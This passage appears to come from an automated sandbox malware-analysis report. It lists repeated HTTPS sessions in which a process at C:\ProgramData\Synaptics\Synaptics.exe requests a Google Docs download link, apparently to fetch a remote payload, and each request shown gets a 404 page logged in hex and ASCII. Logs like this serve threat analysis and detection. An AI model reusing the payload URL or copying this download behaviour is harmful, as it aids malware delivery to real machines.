                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:40 UTC259INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        85192.168.2.349838142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC256OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC260INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oChLMzREAqAikt7TzxU6SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC261INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:40 UTC261INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 33 45 50 35 58 61 67 31 77 52 33 34 43 74 5a 6a 72 63 62 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H3EP5Xag1wR34CtZjrcbGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:40 UTC262INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:40 UTC262INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        86192.168.2.349839142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC259OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC263INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9WGxsSQ5nxzITWmNQOz8JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC264INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 6f 55 61 4b 76 72 67 4a 77 39 41 33 71 33 74 72 50 6e 77 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="moUaKvrgJw9A3q3trPnwlQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:40 UTC265INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:40 UTC266INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        87192.168.2.349842142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC262OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC266INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yMLbI26+KHNmMSG28FOnGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC267INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:40 UTC267INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 34 67 71 65 35 38 37 45 51 53 50 4f 6f 4a 6a 75 43 2b 61 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="e4gqe587EQSPOoJjuC+aSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:40 UTC268INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:40 UTC269INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        88192.168.2.349843142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC266OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC269INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-S4DWIOzXvNdTiPT3Pn31og' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC270INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 6e 30 33 75 61 59 35 63 5a 44 4f 36 45 32 50 41 41 37 50 68 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pn03uaY5cZDO6E2PAA7Phg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:40 UTC272INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:40 UTC272INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        89192.168.2.349844142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:40 UTC269OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:40 UTC272INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:40 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-vSwnWHBwHPLSIiYFmHHZaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:40 UTC273INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:40 UTC273INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 61 4d 46 68 64 34 39 33 47 46 76 4b 33 47 4d 78 53 55 6a 72 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="5aMFhd493GFvK3GMxSUjrw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:40 UTC275INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:40 UTC275INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        9192.168.2.349744142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:30 UTC24OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:30 UTC28INHTTP/1.1 404 Not Found
